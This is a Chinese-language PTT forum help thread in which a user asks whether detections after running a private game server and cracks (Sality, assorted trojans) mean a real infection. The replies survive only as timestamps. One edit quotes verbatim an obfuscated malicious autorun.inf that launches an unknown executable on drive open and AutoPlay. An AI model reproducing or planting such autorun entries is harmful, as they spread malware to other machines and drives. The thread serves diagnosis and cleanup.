[問題] 病毒有可能感染其他.exe檔嗎(avast)
因為朋友放假他在玩x服,想說陪他玩,
我把防毒關掉放x服程式後,
再開啟防毒(當時我忘記把該程式放排除),
結果果然又跳出說隔離。
接下來就囧了,
防毒開始發神經似的開始跳出其他我以前遊戲或是程式.exe說有毒要隔離,
像offoce(某個程式)/bbo(遊戲執行檔&移除檔)/破解檔,
我在手動完整掃描or執行都不曾要跳出過中毒訊息。
我想說可能是個案吧 把AVAST移除安裝小紅傘。
結果安裝完更慘,
三不五時跳出XX.exe檔(幾乎都是執行/移除程式)偵測到病毒或是危害程程式(選項修復),
最扯的連NVIDIA驅動程式資料夾中的7z.exe也被偵測有問題,
另外被丟到隔離的C:\mtyu.exe(我完全沒印象有這個檔案)。
難道我真的中毒了嗎?
還是只是誤會一場?
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 36.231.21.112
推
03/13 21:50, , 1F
03/13 21:50, 1F
推
03/14 02:17, , 2F
03/14 02:17, 2F
→
03/14 02:17, , 3F
03/14 02:17, 3F
推
03/14 02:24, , 4F
03/14 02:24, 4F
→
03/14 02:24, , 5F
03/14 02:24, 5F
看了一下 好像沒那麼嚴重 但也不輕鬆就是...
第一次掃出3x個
1.幾乎都是移除/執行/安裝檔都能修復成功
包含 W32/Sality.AT Windows 病毒碼
2.幾個是遊戲x服or中文化程式or破解(無法修復 不確定是否為誤判or被感染)
是 TR/Barys.1776.28 特洛伊木馬程式
是 TR/Agent.49664.29 特洛伊木馬程式
是 TR/Gendal.78848.7 特洛伊木馬程式
包含 W32/Sality.AT Windows 病毒碼
是 TR/Dropper.Gen 特洛伊木馬程式
是 TR/PSW.OnlineGames.xxaa 特洛伊木馬程式
包含 DR/Drop.Mudrop.kzg 病毒植入程式的辨識模式
是 TR/Sasfis.awqq 特洛伊木馬程式
是 TR/ATRAPS.Gen 特洛伊木馬程式
是 TR/Kazy.37274.13 特洛伊木馬程式 (這是網路遊戲安裝檔)
3.我不知道的exe檔
C:\mtyu.exe (我找不到了...)
F:\dvkpim.exe 是 TR/Crypt.ZPACK.Gen 特洛伊木馬程式
G:\hllox.exe 是 TR/Crypt.ZPACK.Gen 特洛伊木馬程式
剛看了一下 上面3個好像是個槽的autorun.inf文建檔的
例如
;GCbrPyuyTavEYIC eyOeTFtMIdTdgoGBi rrqj rxQcci rcgmEvDvwuhJsNmnQRoJTaleevuHy
[AutoRun]
;fuswFllhPsF nkJCBRuuucWYvmFrqsdxyBySmmRHxQq iBtTVdNGDwc apItke
;orsafovKBa AEhncA XnwjHiwceLqKCwBABIvJnp tCyk khqIrNnTOQOemUU ffVydwHpTQ
sHell\opEn\dEfault=1
;ojuNx
oPen=hllox.exe
;khlqGurTjNXq ltDCyQ
shELL\explORE\CoMmAnd=hllox.exe
;dgCPEE HaFtP ontrr
SHell\open\cOMmaND =hllox.exe
;KbYqMoXHigDvxo nnsvyR iGXaj GpXvpDodJw kAsdXk nVJi
ShelL\AutoPlay\command =hllox.exe
※ 編輯: GBO5 來自: 36.231.21.112 (03/14 08:01)
推
03/14 08:28, , 6F
03/14 08:28, 6F
→
03/14 09:33, , 7F
03/14 09:33, 7F
→
03/14 09:35, , 8F
03/14 09:35, 8F
→
03/14 11:50, , 9F
03/14 11:50, 9F
→
03/14 12:10, , 10F
03/14 12:10, 10F
→
03/14 12:10, , 11F
03/14 12:10, 11F
→
03/14 12:11, , 12F
03/14 12:11, 12F
→
03/14 12:53, , 13F
03/14 12:53, 13F
→
03/14 12:53, , 14F
03/14 12:53, 14F
目前的作法是掃毒完把能修復的修復
移動到隔離區的刪除
c/f/g槽的autorun.inf手動移除
再重開用小紅傘掃一次後沒掃出問題
再來可能會先用有人推薦的Avira AntiVir Rescue System掃看看
另外關於重灌
是只要單純重灌系統槽?還是連其他槽都要一起格式化?
※ 編輯: GBO5 來自: 36.231.101.182 (03/14 15:07)
→
03/14 22:26, , 15F
03/14 22:26, 15F
→
03/14 22:28, , 16F
03/14 22:28, 16F
→
03/14 22:28, , 17F
03/14 22:28, 17F
那我先再問個問題(因為重灌雖然簡單但之後的路程才麻煩...)
如果我現在重開機後各槽皆沒有autorun.inf檔(其他地方的都正常 沒被修改)
之後用小紅傘完整掃描也沒掃出病毒
那這樣代表我電腦正常了嗎?還是說可能會有潛伏期?
另外再掃毒中執行其他程式會影響掃毒準確率嗎?
※ 編輯: GBO5 來自: 36.231.106.63 (03/15 00:34)
推
03/16 01:50, , 18F
03/16 01:50, 18F
真的...
不過我虛擬機也有問題...(找不到解)
VMware10
跳出VMware Workstation unrecoverable error: (vcpu-0)
如圖 http://i.imgur.com/e5w7kvc.jpg
點OK後強制關閉虛擬主機
不點就卡在那邊
→
03/16 09:50, , 19F
03/16 09:50, 19F
→
03/16 09:51, , 20F
03/16 09:51, 20F
→
03/16 09:52, , 21F
03/16 09:52, 21F
→
03/16 09:54, , 22F
03/16 09:54, 22F
所以躲在系統的病毒 防毒掃不到嗎?
→
03/16 09:54, , 23F
03/16 09:54, 23F
其實我也不知道有沒有問題
因為防毒把疑似病毒都修復成功&不能修復的移動到隔離區(手動移除)
再把可疑的autorun.inf檔手動刪除
經過2天也沒有再掃出病毒的跡象
→
03/16 09:55, , 24F
03/16 09:55, 24F
→
03/16 09:55, , 25F
03/16 09:55, 25F
所以如果用Avira的防毒光碟掃完沒有異狀的話(話說...何謂異狀?)
是否代表正常?還是說有潛伏可能?
→
03/16 09:57, , 26F
03/16 09:57, 26F
→
03/16 09:58, , 27F
03/16 09:58, 27F
→
03/16 09:59, , 28F
03/16 09:59, 28F
→
03/16 09:59, , 29F
03/16 09:59, 29F
關非系統槽沒學過
現在我大概頃向重灌系統槽吧(雖然能不用的話當然不用...)
※ 編輯: GBO5 來自: 36.231.102.231 (03/16 16:38)
→
03/16 17:44, , 30F
03/16 17:44, 30F
→
03/16 17:45, , 31F
03/16 17:45, 31F
→
03/16 17:46, , 32F
03/16 17:46, 32F
→
03/16 17:47, , 33F
03/16 17:47, 33F
→
03/16 17:48, , 34F
03/16 17:48, 34F
→
03/16 17:49, , 35F
03/16 17:49, 35F
→
03/16 17:50, , 36F
03/16 17:50, 36F
→
03/16 17:51, , 37F
03/16 17:51, 37F
→
03/16 17:53, , 38F
03/16 17:53, 38F
→
03/16 17:53, , 39F
03/16 17:53, 39F
→
03/16 17:54, , 40F
03/16 17:54, 40F
→
03/16 17:55, , 41F
03/16 17:55, 41F
→
03/16 17:56, , 42F
03/16 17:56, 42F
→
03/16 17:56, , 43F
03/16 17:56, 43F
→
03/16 17:58, , 44F
03/16 17:58, 44F
→
03/16 18:00, , 45F
03/16 18:00, 45F
了解 這2天看下來 網路流量/首頁綁架/帳號 皆沒有問題
只有昨天莫名被wikiwiki鎖ip(表示該ip亂編輯)不過我是浮動ip 所以應該是個案
我之後應該還是會找時間重灌(畢竟遊戲帳號被盜大概跟信用卡盜刷一樣心痛)
問個問題
這樣算中毒現象嗎?(以前都不會注意 但現在有中毒可能就開始疑神疑鬼了...)
1.登入遊戲I游標閃爍異常(只有該遊戲會這樣 其他文件檔/論壇輸入都正常)
這是正常閃爍(穩定)
http://youtu.be/Ao9yxZlDOuM
這是異常閃爍(出現遊標後持續閃爍)
http://youtu.be/SmunNo2fcgY
2.svchost.exe吃記憶體吃到2xx,xxxK
http://i.imgur.com/sUeqejA.jpg
開機剛開始只有1xx,xxxK 隨後慢慢變高到2xx,xxK
※ 編輯: GBO5 來自: 36.231.18.233 (03/16 19:15)
→
03/16 20:17, , 46F
03/16 20:17, 46F
→
03/16 20:19, , 47F
03/16 20:19, 47F
→
03/16 21:05, , 48F
03/16 21:05, 48F
→
03/16 21:06, , 49F
03/16 21:06, 49F
→
03/16 21:06, , 50F
03/16 21:06, 50F
→
03/16 21:07, , 51F
03/16 21:07, 51F
→
03/16 21:07, , 52F
03/16 21:07, 52F
→
03/16 21:08, , 53F
03/16 21:08, 53F
→
03/16 21:08, , 54F
03/16 21:08, 54F
→
03/16 21:09, , 55F
03/16 21:09, 55F
→
03/16 21:10, , 56F
03/16 21:10, 56F
我對svhost右鍵 移至服務有幾個被圈選 這樣看的出來嗎?
AudioEndpointBulder
CscService
hidserv
Netman
PcaSvc
SysMain
TrkWks
UxSms
※ 編輯: GBO5 來自: 36.231.17.42 (03/17 12:39)
→
03/17 14:21, , 57F
03/17 14:21, 57F
服務那邊看的到記憶體消耗嗎?
2xxmb是svchost.exe
描述:Windows Services 的主機處理程序
位置:C:\Windows\System32
http://i.imgur.com/sUeqejA.jpg
我對該svhost.exe右鍵 移至服務上敘是被選取的服務
※ 編輯: GBO5 來自: 36.231.104.97 (03/17 17:13)
→
03/17 18:36, , 58F
03/17 18:36, 58F
→
03/17 18:36, , 59F
03/17 18:36, 59F
→
03/17 18:37, , 60F
03/17 18:37, 60F
→
03/17 18:38, , 61F
03/17 18:38, 61F
AntiVirus 近期熱門文章
PTT數位生活區 即時熱門文章
